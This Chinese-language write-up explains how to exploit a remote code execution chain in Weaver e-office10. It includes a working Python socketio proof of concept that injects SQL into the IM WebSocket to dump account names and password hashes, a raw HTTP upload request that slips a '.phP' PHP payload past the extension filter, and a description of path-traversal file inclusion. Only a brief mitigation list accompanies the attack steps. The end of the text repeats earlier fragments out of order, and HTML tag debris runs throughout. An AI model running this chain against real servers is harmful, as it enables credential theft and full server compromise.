泛微 e-office10 远程代码执行漏洞分析与利用<\/h1>

漏洞概述<\/h2>

泛微 e-office10 存在一个远程代码执行漏洞，该漏洞由两部分组成：<\/p>

通过 WebSocket 接口的 SQL 注入漏洞<\/li>

文件上传结合文件包含导致的远程代码执行<\/li> <\/ol>

漏洞分析<\/h2>

1. WebSocket 接口 SQL 注入<\/h3>
漏洞位于 IM 服务的 WebSocket 接口中，具体路径为 `\/web<\/code> namespace 下的 outline recordLength<\/code> 事件处理。<\/p>`

关键点：<\/h4>

漏洞触发点：getPersonalOfflineRecord<\/code> 方法<\/li>
注入参数：loginUserId<\/code> 通过 query 参数传入<\/li>
受影响服务端口：4986 (IM 服务默认端口)<\/li>
<\/ul>
漏洞利用条件：<\/h4>

需要存在 chat_personal_record<\/code> 开头的表（系统默认会创建这些表，用户聊天后会自动生成如 chat_personal_record_1<\/code> 等表）<\/li>
<\/ul>
2. 文件上传与包含<\/h3>
文件上传部分：<\/h4>

上传接口：\/eoffice10\/server\/public\/api\/welink\/welink-move<\/code><\/li>
上传限制：

文件内容校验（仅校验为 jpg 格式）<\/li>
上传目录为 attachment<\/code> 子目录，无法直接访问<\/li>
文件名过滤（但可通过大小写绕过，如上传 .phP<\/code> 文件）<\/li>
<\/ul>
<\/li>
<\/ul>
文件包含部分：<\/h4>

包含函数：getArrayFromPhp<\/code><\/li>
包含路径构造：

使用 getLangFileFullPath<\/code> 方法<\/li>
通过 ..\/..\/<\/code> 目录遍历<\/li>
Windows 系统下大小写不敏感特性可利用（.phP<\/code> 可被当作 .php<\/code> 包含）<\/li>
<\/ul>
<\/li>
<\/ul>
漏洞利用步骤<\/h2>
1. WebSocket SQL 注入利用<\/h3>
import<\/span> socketio
<\/span><\/span>
<\/span><\/span>sio =<\/span> socketio.<\/span>Client()
<\/span><\/span>
<\/span><\/span>@sio<\/span>.<\/span>on('connect'<\/span>, namespace=<\/span>'\/web'<\/span>)
<\/span><\/span>def<\/span> connect<\/span>():
<\/span><\/span>    print('Connected to the server'<\/span>)
<\/span><\/span>    sio.<\/span>emit('outline recordLength'<\/span>, None<\/span>, namespace=<\/span>'\/web'<\/span>)
<\/span><\/span>
<\/span><\/span>@sio<\/span>.<\/span>on('send recordLength'<\/span>, namespace=<\/span>'\/web'<\/span>)
<\/span><\/span>def<\/span> on_message<\/span>(data):
<\/span><\/span>    print('Received data: '<\/span> +<\/span> str(data))
<\/span><\/span>
<\/span><\/span># SQL注入获取用户凭证<\/span>
<\/span><\/span>sio.<\/span>connect('http:\/\/192.168.0.139:4986?loginUserId=aa",`chat_object`) union select 1,2,3,group_concat(user_accounts,0x7e,password,0x7e),5,6,0,8,9,10,11,12 from user%23&loginDeptId=0&loginRoleId=1'<\/span>, namespaces=<\/span>['\/web'<\/span>])
<\/span><\/span>
<\/span><\/span>try<\/span>:
<\/span><\/span>    sio.<\/span>wait()
<\/span><\/span>except<\/span> KeyboardInterrupt<\/span>:
<\/span><\/span>    pass<\/span>
<\/span><\/span>finally<\/span>:
<\/span><\/span>    sio.<\/span>disconnect()
<\/span><\/span><\/code><\/pre>2. 文件上传与包含利用<\/h3>
文件上传请求示例：<\/h4>
POST \/eoffice10\/server\/public\/api\/welink\/welink-move HTTP\/1.1
Host: 192.168.0.139:8010
User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko\/20100101 Firefox\/47.0
Accept: application\/json, text\/plain, *\/*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http:\/\/192.168.0.139:8010\/eoffice10\/client\/web\/system\/user\/manage
Connection: close
Content-Type: multipart\/form-data; boundary=----WebKitFormBoundaryvQIRygBK
Content-Length: 8003

------WebKitFormBoundaryvQIRygBK
Content-Disposition: form-data; name="file"; filename="1.phP"
Content-Type: image\/png

<jpg文件头><?php phpinfo(); ?>
------WebKitFormBoundaryvQIRygBK--
<\/code><\/pre>
文件包含利用：<\/h4>
通过构造请求包含上传的 PHP 文件，利用 Windows 大小写不敏感特性执行代码。<\/p>
临时修复方案<\/h2>

使用防护类设备对相关资产进行 SQL 注入、文件包含等攻击的防护<\/li>
在确认不影响业务的情况下可临时关闭 IM 服务<\/li>
使用网络 ACL 策略限制 IM 服务的公网访问<\/li>
<\/ol>
环境要求<\/h2>

Python 环境需要特定版本的 socketio 库：
pip install python-engineio==<\/span>3.14.2 python-socketio==<\/span>4.6.0
<\/span><\/span><\/code><\/pre><\/li>
目标系统：Windows（利用文件包含的大小写不敏感特性）<\/li>
<\/ul>
注意事项<\/h2>

获取的密码为 MD5(unix) 格式，可能需要破解<\/li>
上传的文件位于 attachment<\/code> 子目录，无法直接访问，必须通过文件包含漏洞利用<\/li>
利用 Windows 系统特性，上传 .phP<\/code> 文件可被当作 .php<\/code> 文件包含执行<\/li>
<\/ol>

泛微 e-office10 远程代码执行漏洞分析与利用<\/h1>

漏洞分析<\/h2>

1. WebSocket 接口 SQL 注入<\/h3> 漏洞位于 IM 服务的 WebSocket 接口中，具体路径为 \/web<\/code> namespace 下的 outline recordLength<\/code> 事件处理。<\/p>

2. 文件上传与包含<\/h3>

漏洞利用步骤<\/h2>

2. 文件上传与包含利用<\/h3>

文件包含利用：<\/h4> 通过构造请求包含上传的 PHP 文件，利用 Windows 大小写不敏感特性执行代码。<\/p>

1. WebSocket 接口 SQL 注入<\/h3>
漏洞位于 IM 服务的 WebSocket 接口中，具体路径为 `\/web<\/code> namespace 下的 outline recordLength<\/code> 事件处理。<\/p>`

文件包含利用：<\/h4>
通过构造请求包含上传的 PHP 文件，利用 Windows 大小写不敏感特性执行代码。<\/p>